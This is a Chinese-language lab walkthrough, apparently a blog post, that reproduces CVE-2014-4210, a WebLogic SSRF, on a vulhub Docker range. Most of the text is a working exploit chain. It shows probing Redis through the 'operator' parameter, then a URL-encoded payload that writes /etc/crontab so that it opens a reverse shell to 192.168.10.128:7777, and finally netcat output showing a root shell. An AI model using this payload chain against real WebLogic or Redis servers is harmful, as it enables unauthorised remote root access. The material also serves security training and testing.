WebLogic-Redis:CVE-2014-4210[SSRF]

环境部署

vulhub:/vulhub-master/weblogic/ssrf

1.开启靶场

复制代码
[root@localhost ssrf]# docker-compose up -d
Starting ssrf_redis_1 ... done
Starting ssrf_weblogic_1 ... done

2. 查看端口

复制代码
[root@localhost ssrf]# docker ps
CONTAINER ID   IMAGE                           COMMAND                  CREATED        STATUS              PORTS                                                 NAMES
6ef6868dbbb9   vulhub/weblogic:10.3.6.0-2017   "startWebLogic.sh"       26 hours ago   Up About a minute   5556/tcp, 0.0.0.0:7001->7001/tcp, :::7001->7001/tcp   ssrf_weblogic_1
86f083e195f6   vulhub/baselinux:centos-6       "/docker-entrypoint...."   26 hours ago   Up About a minute   6379/tcp                                              ssrf_redis_1

3.获取redis内网ip【172.22.0.2】

docker exec -it 容器ID ifconfig

复制代码
[root@localhost ssrf]# docker exec -it 86f083e195f6 ifconfig
eth0      Link encap:Ethernet  HWaddr 02:42:AC:16:00:02
          inet addr:172.22.0.2  Bcast:172.22.255.255  Mask:255.255.0.0

4.访问漏洞发生页面

复制代码
http://192.168.10.5:7001/uddiexplorer/SearchPublicRegistries.jsp

漏洞利用

1.打开bp代理

2.页面输入任意内容提交,bp抓包

漏洞点参数为 operator

3.替换参数,测试端口开启情况

复制代码
operator=http://172.22.0.2:6379/

查看响应包中内容

复制代码
An error has occurred<BR>
weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://172.22.0.2:6379/ which did not have a valid SOAP content-type: null.

发生<BR>错误
weblogic.uddi.client.structures.exception.XML_SoapException:收到来自 url: http://172.22.0.2:6379/ 的响应,该响应没有有效的 SOAP content-type: null。

4.编写payload

set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >&
/dev/tcp/192.168.10.128/7777 0>&1' \n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

5.进行url编码

encodeURIComponent编码方式

复制代码
set%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%0A%2Fdev%2Ftcp%2F192.168.10.128%2F7777%200%3E%261'%20%5Cn%5Cn%5Cn%5Cn%22%20config%20set%20dir%20%2Fetc%2F%0Aconfig%20set%20dbfilename%20crontab%0Asave

6.将编码后的所有换行符替换

由于redis命令由 \r\n 结尾,需要将 %0A 替换为 %0D%0A

将命令保存为txt文档,选中指定内容 ctrl+h 进行替换

替换后:

复制代码
set%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%0D%0A%2Fdev%2Ftcp%2F192.168.10.128%2F7777%200%3E%261'%20%5Cn%5Cn%5Cn%5Cn%22%20config%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave

7.在二次加工后的payload添加指定内容

最终payload:

对红色部分进行替换

operator=http://172.22.0.2:6379/test%0D%0A%0D%0Aset%201%20%22%

5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200- 6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.10.128%2F7777%200%3E%

261'%20%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0

D%0Alalala

8.监听7777端口

nc lvp 7777

9.发送数据包,进行反弹连接

复制代码
连接成功:
┌──(root㉿kali)-[~]
└─# nc -lvp 7777  
listening on [any] 7777 ...

192.168.10.5: inverse host lookup failed: Unknown host
connect to [192.168.10.128] from (UNKNOWN) [192.168.10.5] 35496
sh: no job control in this shell
sh-4.1# 
sh-4.1# ls
ls
anaconda-ks.cfg
install.log
install.log.syslog
sh-4.1# 
相关推荐
xixingzhe25 小时前
SpringBoot + Nginx 免鉴权接口安全防护方案
运维·nginx·安全
中科岩创5 小时前
宁波某大学高支模施工安全监测实训模型应用
科技·物联网·安全·自动化
项目经理老王6 小时前
OpenClaw无捆绑安装包,安全纯净版AI助手部署
人工智能·安全
小李@Free2FA12 小时前
跨境卖家多平台二次验证统一管理
安全·外贸·2fa·二次验证
fei_sun13 小时前
开放最短路径优先OSPF----基于链路状态
网络
精明的身影14 小时前
网络计划WebApp求解:融合Python与AI决策的项目管理系统
网络·python·web app
云祺vinchin14 小时前
混合云异构环境下的灾备实战:VMware+Hyper-V统一保护方案解析
安全·容灾备份·容灾备份体系
MartinYeung514 小时前
从注入攻击到诈骗:@martin_yeung/llm-up-guardrail 提供生产级 AI 安全防护
人工智能·安全
chengbei1214 小时前
SoloXSS:一款现代化的自托管 XSS平台
web安全·xss漏洞·xss平台
Let's Chat Coding15 小时前
对称密钥认证:主机和设备共享同一把密钥
运维·服务器·网络